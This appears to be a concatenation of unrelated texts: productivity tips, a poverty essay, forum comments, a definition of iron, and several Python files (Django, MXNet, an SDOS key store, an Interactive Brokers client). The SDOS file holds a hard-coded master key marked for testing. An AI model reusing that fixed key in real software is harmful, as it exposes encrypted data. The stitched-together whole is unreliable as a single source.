Model.. It works. It is easy to get caught in the in-efficient patch-work of Emails, apps, excel-sheets and chat clients. And once this happens, it’s almost impossible to come out. Before you start something, set a process and adhere to that. It will be hard for a while; but you’ll thank yourself later! Defining a step-by-step process for the team will enable them to grasp it faster and get in action without much of trial-n-error. With a defined process, you can get things done faster, better and more efficiently. 6. Re-size the Project; Da Vinci did too.. When you are working on a large project it becomes difficult to focus on smaller things. In such a case, it is recommended to break such tasks in to smaller chunks. You will be able to define a clear roadmap to cover all the chunks within the given timeline and concentrate on each task. Think how a Lion singles out an elephant and concentrates on it while hunting rather than leaping on the whole herd. 7. But they are good! All of us have faced it and very well know the pressure of deadline, but they are good. Nobody is going to kill anybody for missing the deadline, but it motivates us to finish our task before time, quickly and efficiently. You must be wondering that how sharing information can effect productivity. The simple secret is that when team starts sharing information with each other, they spend less time researching and emailing. So instead of holding the information to yourself, share as much as you can. 9. Wave out Distractions; they kill too.. Whether we browse internet, take emergency calls, quick chat, or have a coffee break; distractions are a part of our work life. Probably before you end reading this statement, you already know list of distractions that affect your productivity, so just try to wave it off. At each and every workplace, when everything is planned and smooth, the major problem is created when unplanned and ad-hoc tasks come up that interfere the process. Should these tasks be avoided or we should be prepared for such unplanned tasks!? The simple answer is to be prepared for them. Planning and preparation walk hand in hand. When you are planning for new tasks, you need to also be prepared to tackle the unplanned efforts. It often happens that while you are working on important things, you are asked to work on trivial ones; although you are not ready for that but you are unable to say ‘No’ and ultimately it impacts your productivity. So, the best way to survive such invitations is by building right boundaries and declining the offer smartly. Enough said! Check this out, thank us later. Because not all tasks are ‘urgent’ so when you have the list of tasks, define the priority of each task. This will help you to finish the major and priority task at the earliest and spare time for others. 13. Relish your Hard work, always! When you have a defined deadline and important task on priority, then you will have to sprint and ensure that it is finished on time including all the crisis management. *At the same time it is also important that once you finish the task, you need to take a break, relax and relish your hard work! Improper sleep can badly affect your health and hamper your productivity. Taking complete sleep relaxes your body and brain which is very necessary for increased output. We have listed these tips and tricks based on our experiences and research which can be further updated based on your reviews, so keep sending us your views and comments so we all can benefit out of it.
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='CaptionedFile', fields=[ ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)), ('caption', models.CharField(max_length=200, verbose_name='caption')), ('publication', models.FileField(verbose_name='Uploaded File', upload_to='captioned-files')), ], options={ 'verbose_name': 'Captioned File', 'verbose_name_plural': 'Captioned Files', }, ), migrations.CreateModel( name='UncaptionedFile', fields=[ ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)), ('publication', models.FileField(verbose_name='Uploaded File', upload_to='uncaptioned-files')), ], options={ 'verbose_name': 'Uncaptioned File', 'verbose_name_plural': 'Uncaptioned Files', }, ), ]
Poverty is an emotionally powerful subject. With few exceptions global human quality of life is structured from a base of economic opportunities hailed as modern civilization marching to a cadence seeking prosperity through enterprise, commerce and trade. Contemporary social design is a byproduct of early Mesopotamia referred to as “the cradle of civilization.” Social patterns evolved from this base developing geographically mixed cultures in a mutual quest for fiscal gain. Economics, trade and enterprise are world encompassing with striking disparity and exclusion. “Absolute poverty” is the most desolate, without adequate food or shelter, barely surviving and often plagued with extreme hunger and death by starvation. Education and medical services are compromised or non-existent. “Relative poverty” is a condition gauged according to a threshold established by income demography. US poverty is categorized as relative poverty. Relative poverty is less apparent, homelessness being the most visual circumstance. In Los Angeles County on given nights in excess of 80,000 people are homeless. “Asceticism” is voluntary poverty used as a method of seeking spiritual consciousness and a plane of life in opposition to the omnipresent ambition for affluence through economic status, material gain and accumulation. Practitioners of asceticism vow poverty as a means of teaching, revealing meaningful values beyond infusion of wealth and abundance as sources of enlightenment. Kenya and sub Saharan Africa display vivid, widespread examples of extreme, absolute poverty. Sordid conditions exist in many third world countries; however, statistically the degree is most pronounced in sub Saharan Africa. The film documentary: The End of Poverty? Think Again is a compelling revelation exposing the level of horror these places have become. Children gleaning trash heaps for anything of the slightest value. The little work available is slave labor type jobs with finite wages, taxed heavily by corrupt governments preying on the world’s poorest of the poor. Many third world regions have abundant natural resources and industrialized countries have exploited these resources in order to produce manufactured consumer goods for global distribution and economic gain. Large loans were pressed upon these impoverished countries under the guise of development projection, which has never manifested as industrialized countries continued to extract resources without implementation of self-sustaining commerce leaving a residue of extreme debt without ability to reduce the debt. Corrupt governments claim the need for high taxation in order to pay the debt, which is not occurring thereby suffering, continues. Countries achieving economic success and prosperity have melded manufacturing and consumption. This formula relies on an expanding rate of consumption. If consumption dwindles, economies dwindle. In present day America excessive consumption is ubiquitous. There is an urgent drive to expand manufacturing and consumption as a means of strengthening economic conditions. Questions appear regarding this social design. Is this balance or imbalance? The collective mentality is, “I have earned everything I own.” A more honest assessment would be, “I have been given opportunity to succeed.” Opportunity does not exist in sub Sahara. So, where are the answers? Will disparity continue and increase? Charitable food donations given to oppressed countries are pilfered and sold by corrupt, ruling powers. Some would say this is a natural process as the Africans are incapable of competing. Africa was much slower to be influenced by the new civil design remaining a cohesive hunter-gatherer culture far longer than Europeans. When I see old photos of tribal Africa I see an extremely self-reliant race of people, harmonious and thriving for thousands of years in a harsh and challenging place. These are very strong people, likely the strongest in the history of humanity. The tribal villages and housing of ancient Africa were far more inviting and comfortable than the hovels of tin and cardboard that modern civilization has bestowed upon them. No culture has been more exploited than the Africans. The English came first, seized their land, killed their game for sport, and brought an entirely new living design, forcing radical change upon them. Enslaved them, sold them, continuing exploitation today as natural resources are pillaged without reward, and the global glut feeds itself on commandeered wealth leaving a wake of unfathomable despair. Natural forces are the source of all earthly endeavors; capable of overpowering human created dysfunctions. Healing will likely be presented naturally, uninfluenced by the Dow Jones Average or the Gross National Product. Humanity has moved away from its organic roots seeking idolatry ritual within material wealth. Early tribal cultures embraced communal uniformity, housing was equal, and the act of sharing was important to security and longevity. Hunter-gatherers were directly connected to the earth; life was sustained by earth’s gifts creating harmony, which has been lost in the current living design. Globally we have fallen into ethical contraction, expanding intolerance and the ever-presence of war, questioning direction and purpose. If we as a species are unable to alter inequities, solutions will self-generate. It would behoove the onslaught, self-feeding frenzy of acquisition to seek greater balance and sensitivity gearing energy toward apportionment and equality. As a species we have proven an ability to invent and install highly complex, technical devices it would seem equally possible to install basic comforts to those in dire need. Compassion is not complex.
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # coding: utf-8 """Interface for NDArray functions executed by torch backend. Install Torch and compile with USE_TORCH=1 to use this module.""" from __future__ import absolute_import import ctypes import sys from .base import _LIB from .base import c_array, c_str_array, c_handle_array, py_str, build_param_doc as _build_param_doc from .base import mx_uint, mx_float, FunctionHandle from .base import check_call from .ndarray import NDArray, _new_empty_handle try: _LUAJIT = ctypes.CDLL("libluajit.so", mode=ctypes.RTLD_GLOBAL) except OSError: _LUAJIT = None # pylint: disable=too-many-locals, invalid-name def _make_torch_function(handle): """Create a Torch function from the FunctionHandle.""" # Get the property of function n_used_vars = mx_uint() n_scalars = mx_uint() n_mutate_vars = mx_uint() type_mask = ctypes.c_int() check_call(_LIB.MXFuncDescribe( handle, ctypes.byref(n_used_vars), ctypes.byref(n_scalars), ctypes.byref(n_mutate_vars), ctypes.byref(type_mask))) n_mutate_vars = n_mutate_vars.value n_used_vars = n_used_vars.value n_scalars = n_scalars.value type_mask = type_mask.value # Get the information from the function name = ctypes.c_char_p() desc = ctypes.c_char_p() num_args = mx_uint() arg_names = ctypes.POINTER(ctypes.c_char_p)() arg_types = ctypes.POINTER(ctypes.c_char_p)() arg_descs = ctypes.POINTER(ctypes.c_char_p)() ret_type = ctypes.c_char_p() check_call(_LIB.MXFuncGetInfo( handle, ctypes.byref(name), ctypes.byref(desc), ctypes.byref(num_args), ctypes.byref(arg_names), ctypes.byref(arg_types), ctypes.byref(arg_descs), ctypes.byref(ret_type))) func_name = py_str(name.value) if not func_name.startswith('_th_'): return None narg = int(num_args.value) param_str = _build_param_doc( [py_str(arg_names[i]) for i in range(narg)], [py_str(arg_types[i]) for i in range(narg)], [py_str(arg_descs[i]) for i in range(narg)]) if n_mutate_vars > 1: res = ','.join(['res%d '%i for i in range(n_mutate_vars)]) else: res = 'res ' doc_str = (('Interface for Torch function {name}.\n' + 'Invoke with\n{res}= mxnet.th.{name}(Parameters)\nor\n'+ 'mxnet.th.{name}({res}, Parameters).\n\n' + '{param_str}\n' + 'Reference: ' + 'https://github.com/torch/torch7/blob/master/doc/maths.md\n').format( name=func_name[4:], param_str=param_str, res=res)) def generic_torch_function(*args, **kwargs): """Invoke this function by passing in parameters. Parameters ---------- *args Positional arguments of inputs (both scalar and `NDArray`). Returns ------- out : NDArray The result NDArray(tuple) of result of computation. """ ndargs = [] arg_format = '' value = '' for arg in args: if isinstance(arg, NDArray): ndargs.append(arg) arg_format += 'n' value += ',' elif isinstance(arg, int): arg_format += 'i' value += str(arg) + ',' elif isinstance(arg, str): arg_format += 's' value += str(arg) + ',' elif isinstance(arg, float): arg_format += 'f' value += str(arg) + ',' elif isinstance(arg, bool): arg_format += 'b' value += str(arg) + ',' value = value[:-1] if len(ndargs) == n_used_vars: ndargs = [NDArray(_new_empty_handle()) for _ in range(n_mutate_vars)] + ndargs arg_format = 'n'*n_mutate_vars + arg_format value = ','*n_mutate_vars + value elif len(ndargs) == n_mutate_vars + n_used_vars: pass else: raise AssertionError(('Incorrect number of input NDArrays. ' + 'Need to be either %d (inputs) or %d ' + '(output buffer) + %d (input)') % (n_used_vars, n_mutate_vars, n_used_vars)) kwargs['format'] = arg_format kwargs['args'] = value for k in kwargs: kwargs[k] = str(kwargs[k]) check_call(_LIB.MXFuncInvokeEx( handle, c_handle_array(ndargs[n_mutate_vars:]), # pylint: disable=invalid-slice-index c_array(mx_float, []), c_handle_array(ndargs[:n_mutate_vars]), # pylint: disable=invalid-slice-index ctypes.c_int(len(kwargs)), c_str_array(kwargs.keys()), c_str_array(kwargs.values()))) if n_mutate_vars == 1: return ndargs[0] else: return ndargs[:n_mutate_vars] # pylint: disable=invalid-slice-index # End of function declaration ret_function = generic_torch_function ret_function.__name__ = func_name[4:] ret_function.__doc__ = doc_str return ret_function # pylint: enable=too-many-locals, invalid-name def _init_torch_module(): """List and add all the torch backed ndarray functions to current module.""" plist = ctypes.POINTER(FunctionHandle)() size = ctypes.c_uint() check_call(_LIB.MXListFunctions(ctypes.byref(size), ctypes.byref(plist))) module_obj = sys.modules[__name__] for i in range(size.value): hdl = FunctionHandle(plist[i]) function = _make_torch_function(hdl) # if function name starts with underscore, register as static method of NDArray if function is not None: setattr(module_obj, function.__name__, function) # Initialize the NDArray module _init_torch_module()
WhatsApp APK is a Messenger for smartphone Android and other smartphones. WhatsApp uses to message, voice and video calls with friends and family. Switch from SMS to WhatsApp to send and receive messages, pictures, audio notes, and video messages. WHY USE WHATSAPP. Once you and your friends download the app, you can use it to chat as much as you want. Send a million messages a day to your friends for free. After install user can use it for multimedia send Video, Images, and Voice notes to your friends and contacts. And enjoy group conversations with your contacts.
#!/usr/bin/python # coding=utf-8 """ Project MCM - Micro Content Management SDOS - Secure Delete Object Store Copyright (C) <2017> Tim Waizenegger, <University of Stuttgart> This software may be modified and distributed under the terms of the MIT license. See the LICENSE file for details. """ import io import logging from swiftclient import ClientException from sdos.crypto import CryptoLib from sdos.crypto.DataCrypt import DataCrypt OUTERHEADER = 'SDOS_MKEY_V1\0\0\0\0'.encode(encoding='utf_8', errors='strict') # should be 16 bytes long KEYOBJNAME = 'masterkey.sdos' ############################################################################### ############################################################################### # factory ############################################################################### ############################################################################### def masterKeySourceFactory(swiftBackend, keysource_type, container_name_mgmt, tpm_key_id=None): """ select and initialize on of the key sources :param swiftBackend: :param keysource_type: :param container_name_mgmt: :param tpm_key_id: :return: """ if keysource_type == MasterKeyDummy.my_key_type: return MasterKeyDummy() elif keysource_type == MasterKeyStatic.my_key_type: return MasterKeyStatic(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt) elif keysource_type == MasterKeyPassphrase.my_key_type: return MasterKeyPassphrase(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt) elif keysource_type == MasterKeyTPM.my_key_type: return MasterKeyTPM(swiftBackend=swiftBackend, container_name_mgmt=container_name_mgmt, tpm_key_id=tpm_key_id) else: raise TypeError("could not create master key source. type missing or wrong: {}".format(keysource_type)) ############################################################################### ############################################################################### # master key load/store ############################################################################### ############################################################################### def load_wrapped_key(containerNameSdosMgmt, swiftBackend): logging.info("loading the wrapped master key from {}".format(containerNameSdosMgmt)) try: obj = swiftBackend.getObject(container=containerNameSdosMgmt, name=KEYOBJNAME) except ClientException: logging.warning('master key obj was not found in swift container {}'.format(containerNameSdosMgmt)) return None mkh = obj.read(len(OUTERHEADER)) if not mkh == OUTERHEADER: raise TypeError('file header mismatch on master key obj for container {}'.format(containerNameSdosMgmt)) by = io.BytesIO(obj.read()) obj.close() return by def store_wrapped_key(containerNameSdosMgmt, swiftBackend, wrapped_key): logging.info("writing the wrapped master key to {}".format(containerNameSdosMgmt)) obj = OUTERHEADER + wrapped_key.getbuffer() swiftBackend.putObject(container=containerNameSdosMgmt, name=KEYOBJNAME, dataObject=obj) logging.debug('wrote master key to swift mgmt container {}'.format(containerNameSdosMgmt)) ############################################################################### ############################################################################### # dummy key source # a random key each time. no back end requests, key is only in memory during run ############################################################################### ############################################################################### class MasterKeyDummy(object): my_key_type = "dummy" def __init__(self): self.swiftBackend=None self.get_new_key_and_replace_current() ############################################################################### # API for SDOS ############################################################################### def get_current_key(self): return self.plainMasterKey # return CryptoLib.digestKeyString("hallo") def get_new_key_and_replace_current(self): self.plainMasterKey = CryptoLib.generateRandomKey() self.plainMasterKeyBackup = self.plainMasterKey return self.plainMasterKey # return CryptoLib.digestKeyString("hallo") ############################################################################### # API for Swift/Bluebox ############################################################################### def get_status_json(self): return { 'type': self.my_key_type, 'is_unlocked': bool(self.plainMasterKey), 'key_id': CryptoLib.getKeyAsId(self.plainMasterKey), 'is_next_deletable_ready': True } def clear_next_deletable(self): pass def provide_next_deletable(self, passphrase): pass def lock_key(self): self.plainMasterKey = None def unlock_key(self, passphrase=None): self.plainMasterKey = self.plainMasterKeyBackup ############################################################################### ############################################################################### # static key source # a static, hard-coded master key for testing/development ############################################################################### ############################################################################### class MasterKeyStatic(object): STATIC_KEY = CryptoLib.digestKeyString('ALWAYS_THE_SAME') my_key_type = "static" def __init__(self, swiftBackend, container_name_mgmt): self.containerNameSdosMgmt = container_name_mgmt self.swiftBackend = swiftBackend self.plainMasterKey = None try: self.unlock_key() except: logging.error("unlocking master key failed for {}! Key source is not ready...".format( self.containerNameSdosMgmt)) ############################################################################### # API for SDOS ############################################################################### def get_current_key(self): if not self.plainMasterKey: raise KeyError("Master key is not available") return self.plainMasterKey def get_new_key_and_replace_current(self): new_master = CryptoLib.generateRandomKey() self.plainMasterKey = new_master dc = DataCrypt(self.STATIC_KEY) wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master)) store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend, wrapped_key=wrapped_key) return self.plainMasterKey ############################################################################### # API for Swift/Bluebox ############################################################################### def get_status_json(self): return { 'type': self.my_key_type, 'is_unlocked': bool(self.plainMasterKey), 'key_id': CryptoLib.getKeyAsId(self.plainMasterKey), 'is_next_deletable_ready': True } def clear_next_deletable(self): pass def provide_next_deletable(self, passphrase): pass def lock_key(self): self.plainMasterKey = None def unlock_key(self, passphrase=None): logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt)) by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend) if not by: logging.error("no wrapped key found in {}. Assuming first run, creating default key".format( self.containerNameSdosMgmt)) self.get_new_key_and_replace_current() return try: dc = DataCrypt(self.STATIC_KEY) plain = dc.decryptBytesIO(by) self.plainMasterKey = plain.read() except: raise KeyError("Failed decrypting master key") ############################################################################### ############################################################################### # passphrase key source # use a pass phrase as deletable key. the master key will be encrypted with a different # password each time. ############################################################################### ############################################################################### class MasterKeyPassphrase(object): my_key_type = "passphrase" def __init__(self, swiftBackend, container_name_mgmt): self.containerNameSdosMgmt = container_name_mgmt self.swiftBackend = swiftBackend self.plainMasterKey = None self.next_deletable = None logging.error("Passphrase key source initialized for {}. ... set the passphrase to unlock".format( self.containerNameSdosMgmt)) ############################################################################### # API for SDOS ############################################################################### def get_current_key(self): if not self.plainMasterKey: raise KeyError("Master key is not available") return self.plainMasterKey def get_new_key_and_replace_current(self, first_run=False): if not self.next_deletable: raise KeyError("can't replace current master key without new wrapping (deletable) key") if not first_run and not self.plainMasterKey: raise KeyError("not allowed while current master is locked") new_master = CryptoLib.generateRandomKey() self.plainMasterKey = new_master dc = DataCrypt(self.next_deletable) self.next_deletable = None wrapped_key = dc.encryptBytesIO(io.BytesIO(new_master)) store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend, wrapped_key=wrapped_key) return self.plainMasterKey ############################################################################### # API for Swift/Bluebox ############################################################################### def get_status_json(self): return { 'type': self.my_key_type, 'is_unlocked': bool(self.plainMasterKey), 'key_id': CryptoLib.getKeyAsId(self.plainMasterKey), 'is_next_deletable_ready': bool(self.next_deletable) } def clear_next_deletable(self): self.next_deletable = None def provide_next_deletable(self, passphrase): nd = CryptoLib.digestKeyString(passphrase) if not nd: raise KeyError("could not digest the provided passphrase") self.next_deletable = nd def lock_key(self): self.plainMasterKey = None def unlock_key(self, passphrase): logging.info("unlocking the master key from {}".format(self.containerNameSdosMgmt)) by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend) if not by: logging.error("no wrapped key found in {}. Assuming first run, creating default key".format( self.containerNameSdosMgmt)) self.provide_next_deletable(passphrase) self.get_new_key_and_replace_current(first_run=True) return try: dc = DataCrypt(CryptoLib.digestKeyString(passphrase)) plain = dc.decryptBytesIO(by) self.plainMasterKey = plain.read() except: raise KeyError("wrong passphrase. Failed decrypting master key") ############################################################################### ############################################################################### # tpm key source # use a tpm key as deletable key. the master key will be encrypted with a different # tpm-bound, non-migratable key inside the TPM ############################################################################### ############################################################################### class MasterKeyTPM(object): my_key_type = "tpm" def __init__(self, swiftBackend, container_name_mgmt, tpm_key_id): self.containerNameSdosMgmt = container_name_mgmt self.swiftBackend = swiftBackend self.plainMasterKey = None self.keyId = tpm_key_id assert (self.keyId > 0) try: from sdos.util.tpmLib import TpmLib self.tpm = TpmLib() except ImportError: logging.exception("unable to import TPM lib, TPM functions will not be available") self.tpm = None try: self.unlock_key() except: logging.exception("unlocking master key failed for {}! Key source is not ready...".format( self.containerNameSdosMgmt)) ############################################################################### # API for SDOS ############################################################################### def get_current_key(self): if not self.plainMasterKey: raise KeyError("Master key is not available") return self.plainMasterKey def get_new_key_and_replace_current(self, first_run=False): # if not self.next_deletable: # raise KeyError("can't replace current master key without new wrapping (deletable) key") if not first_run and not self.plainMasterKey: raise KeyError("not allowed while current master is locked") new_master = CryptoLib.generateRandomKey() next_deletable = self.tpm.get_new_key_and_replace_current(self.keyId, first_run=first_run) wrapped_key = io.BytesIO(next_deletable.bind(new_master)) # TODO ADD key id to store_wrapped_key? store_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend, wrapped_key=wrapped_key) self.plainMasterKey = new_master return self.plainMasterKey ############################################################################### # API for Swift/Bluebox ############################################################################### def get_status_json(self): return { 'type': self.my_key_type, 'is_unlocked': bool(self.plainMasterKey), 'key_id': CryptoLib.getKeyAsId(self.plainMasterKey), 'is_next_deletable_ready': True } def clear_next_deletable(self): pass def provide_next_deletable(self): pass def lock_key(self): self.plainMasterKey = None def unlock_key(self, passphrase=None): logging.info("unlocking the TPM backed master key from {}".format(self.containerNameSdosMgmt)) by = load_wrapped_key(containerNameSdosMgmt=self.containerNameSdosMgmt, swiftBackend=self.swiftBackend) if not by: logging.error("no wrapped key found in {}. Assuming first run, creating default key".format( self.containerNameSdosMgmt)) self.get_new_key_and_replace_current(first_run=True) return try: deletable = self.tpm.get_current_key(self.keyId) self.plainMasterKey = bytes(deletable.unbind(by.read())) except: raise KeyError("TPM Error. Failed decrypting master key")
I admit that I didn't read every word of the article, but that is not a picture of a screw worm. I know a squirrel when I see one. “We create what every previous generation would have described as magic,” he concludes. Next: Congress claims Harry Potter was a secret weapon that UK stole. They however want more studies before the next budget hearings. and if that doesn't scare you, Nothing will! I dunno FM, seems kinda beige to me. "It helped researchers control the population of a deadly parasite that targets cattle--costing the government $250,000 but ultimately saving the cattle industry more than $20 billion, according to Cooper’s office." Um, then shouldn't the cattle industry have paid for it? Maybe that statement should have read "It helped researchers control the population of a deadly parasite that targets cattle--costing taxpayers $250,000, but ultimately saving US consumers more than $20 billion by reducing the cattle industry's costs...". It has a big stick.
import logging import os import re from optparse import make_option import polib from django.conf import settings from django.core.management.base import BaseCommand from autotranslate.utils import translate_strings logger = logging.getLogger(__name__) class Command(BaseCommand): help = ('autotranslate all the message files that have been generated ' 'using the `makemessages` command.') option_list = BaseCommand.option_list + ( make_option('--locale', '-l', default=[], dest='locale', action='append', help='autotranslate the message files for the given locale(s) (e.g. pt_BR). ' 'can be used multiple times.'), make_option('--untranslated', '-u', default=False, dest='skip_translated', action='store_true', help='autotranslate the fuzzy and empty messages only.'), make_option('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true', help='set the fuzzy flag on autotranslated messages.'), ) def add_arguments(self, parser): # Previously, only the standard optparse library was supported and # you would have to extend the command option_list variable with optparse.make_option(). # See: https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/#accepting-optional-arguments # In django 1.8, these custom options can be added in the add_arguments() parser.add_argument('--locale', '-l', default=[], dest='locale', action='append', help='autotranslate the message files for the given locale(s) (e.g. pt_BR). ' 'can be used multiple times.') parser.add_argument('--untranslated', '-u', default=False, dest='skip_translated', action='store_true', help='autotranslate the fuzzy and empty messages only.') parser.add_argument('--set-fuzzy', '-f', default=False, dest='set_fuzzy', action='store_true', help='set the fuzzy flag on autotranslated messages.') def set_options(self, **options): self.locale = options['locale'] self.skip_translated = options['skip_translated'] self.set_fuzzy = options['set_fuzzy'] def handle(self, *args, **options): self.set_options(**options) assert getattr(settings, 'USE_I18N', False), 'i18n framework is disabled' assert getattr(settings, 'LOCALE_PATHS', []), 'locale paths is not configured properly' for directory in settings.LOCALE_PATHS: # walk through all the paths # and find all the pot files for root, dirs, files in os.walk(directory): for file in files: if not file.endswith('.po'): # process file only # if its a pot file continue # get the target language from the parent folder name target_language = os.path.basename(os.path.dirname(root)) if self.locale and target_language not in self.locale: logger.info('skipping translation for locale `{}`'.format(target_language)) continue self.translate_file(root, file, target_language) def translate_file(self, root, file_name, target_language): """ convenience method for translating a pot file :param root: the absolute path of folder where the file is present :param file_name: name of the file to be translated (it should be a pot file) :param target_language: language in which the file needs to be translated """ logger.info('filling up translations for locale `{}`'.format(target_language)) po = polib.pofile(os.path.join(root, file_name)) strings = self.get_strings_to_translate(po) # translate the strings, # all the translated strings are returned # in the same order on the same index # viz. [a, b] -> [trans_a, trans_b] translated_strings = translate_strings(strings, target_language, 'en', False) self.update_translations(po, translated_strings) po.save() def need_translate(self, entry): if self.skip_translated: return not self.skip_translated or not entry.translated() return not self.skip_translated or not entry.translated() or not entry.obsolete def get_strings_to_translate(self, po): """Return list of string to translate from po file. :param po: POFile object to translate :type po: polib.POFile :return: list of string to translate :rtype: collections.Iterable[six.text_type] """ strings = [] for index, entry in enumerate(po): if not self.need_translate(entry): continue strings.append(humanize_placeholders(entry.msgid)) if entry.msgid_plural: strings.append(humanize_placeholders(entry.msgid_plural)) return strings def update_translations(self, entries, translated_strings): """Update translations in entries. The order and number of translations should match to get_strings_to_translate() result. :param entries: list of entries to translate :type entries: collections.Iterable[polib.POEntry] | polib.POFile :param translated_strings: list of translations :type translated_strings: collections.Iterable[six.text_type] """ translations = iter(translated_strings) for entry in entries: if not self.need_translate(entry): continue if entry.msgid_plural: # fill the first plural form with the entry.msgid translation translation = next(translations) translation = fix_translation(entry.msgid, translation) entry.msgstr_plural[0] = translation # fill the rest of plural forms with the entry.msgid_plural translation translation = next(translations) translation = fix_translation(entry.msgid_plural, translation) for k, v in entry.msgstr_plural.items(): if k != 0: entry.msgstr_plural[k] = translation else: translation = next(translations) translation = fix_translation(entry.msgid, translation) entry.msgstr = translation # Set the 'fuzzy' flag on translation if self.set_fuzzy and 'fuzzy' not in entry.flags: entry.flags.append('fuzzy') def humanize_placeholders(msgid): """Convert placeholders to the (google translate) service friendly form. %(name)s -> __name__ %s -> __item__ %d -> __number__ """ # return re.sub( # r'%(?:\((\w+)\))?([sd])', # lambda match: r'__{0}__'.format( # match.group(1).lower() if match.group(1) else 'number' if match.group(2) == 'd' else 'item'), # msgid) msgid = re.sub( r'%(?:\(([\w\|\:\.]+)\))?(s)', lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 's', '[[[[xstr]]]]'), msgid) msgid = re.sub( r'%(?:\(([\w\|\:\.]+)\))?(d)', lambda match: r'_____{0}_____{1}'.format(match.group(1).lower() if match.group(1) else 'd', '[[[[xnum]]]]'), msgid) return msgid def restore_placeholders(msgid, translation): """Restore placeholders in the translated message.""" placehoders = re.findall(r'(\s*)(%(?:\(\w+\))?[sd])(\s*)', msgid) return re.sub( r'(\s*)(_____[\w]+?_____)(\s*)', lambda matches: '{0}{1}{2}'.format(placehoders[0][0], placehoders[0][1], placehoders.pop(0)[2]), translation) def fix_translation(msgid, translation): # Google Translate removes a lot of formatting, these are the fixes: # - Add newline in the beginning if msgid also has that if msgid.startswith('\n') and not translation.startswith('\n'): translation = u'\n' + translation # - Add newline at the end if msgid also has that if msgid.endswith('\n') and not translation.endswith('\n'): translation += u'\n' # Remove spaces that have been placed between %(id) tags translation = restore_placeholders(msgid, translation) return translation
What is the definition of Iron? It is a heavy malleable ductile magnetic silver-white metallic element that readily rusts in moist air, occurs native in meteorites and combined in most igneous rocks, is the most used of metals, and is vital to biological processes as in transport of oxygen in the body. The Physical and Chemical Properties are the characteristics of a substance, like Iron, which distinguishes it from any other substance. Most common substances, like Iron, exist as States of Matter as solids, liquids, gases and plasma. Refer to the article on Iron Element for additional information and facts about this substance. This article on Iron properties provide facts and information about the physical and chemical properties of Iron which are useful as homework help for chemistry students. Additional facts and information regarding the Periodic Table and the elements may be accessed via the Periodic Table Site Map.
from dateutil.tz import tz import datetime from ib_insync import Contract from ib_insync import IB from sysbrokers.IB.ib_connection import connectionIB from syscore.dateutils import strip_timezone_fromdatetime from syslogdiag.logger import logger from syslogdiag.log_to_screen import logtoscreen _PACING_PERIOD_SECONDS = 10 * 60 _PACING_PERIOD_LIMIT = 60 PACING_INTERVAL_SECONDS = 1 + (_PACING_PERIOD_SECONDS / _PACING_PERIOD_LIMIT) STALE_SECONDS_ALLOWED_ACCOUNT_SUMMARY = 600 IB_ERROR_TYPES = {200: "invalid_contract"} IB_IS_ERROR = [200] class ibClient(object): """ Client specific to interactive brokers We inherit from this to do interesting stuff, so this base class just offers error handling and get time """ def __init__(self, ibconnection: connectionIB, log: logger=logtoscreen("ibClient")): # means our first call won't be throttled for pacing self.last_historic_price_calltime = ( datetime.datetime.now() - datetime.timedelta( seconds=_PACING_PERIOD_SECONDS)) # Add error handler ibconnection.ib.errorEvent += self.error_handler self._ib_connnection = ibconnection self._log = log @property def ib_connection(self) -> connectionIB: return self._ib_connnection @property def ib(self) -> IB: return self.ib_connection.ib @property def client_id(self) -> int: return self.ib.client.clientId @property def log(self): return self._log def error_handler(self, reqid: int, error_code: int, error_string: str, contract: Contract): """ Error handler called from server Needs to be attached to ib connection :param reqid: IB reqid :param error_code: IB error code :param error_string: IB error string :param contract: IB contract or None :return: success """ if contract is None: contract_str = "" else: contract_str = " (%s/%s)" % ( contract.symbol, contract.lastTradeDateOrContractMonth, ) msg = "Reqid %d: %d %s %s" % ( reqid, error_code, error_string, contract_str) iserror = error_code in IB_IS_ERROR if iserror: # Serious requires some action myerror_type = IB_ERROR_TYPES.get(error_code, "generic") self.broker_error(msg, myerror_type) else: # just a warning / general message self.broker_message(msg) def broker_error(self, msg, myerror_type): self.log.warn(msg) def broker_message(self, msg): self.log.msg(msg) def refresh(self): self.ib.sleep(0.00001) def get_broker_time_local_tz(self) -> datetime.datetime: ib_time = self.ib.reqCurrentTime() local_ib_time_with_tz = ib_time.astimezone(tz.tzlocal()) local_ib_time = strip_timezone_fromdatetime(local_ib_time_with_tz) return local_ib_time
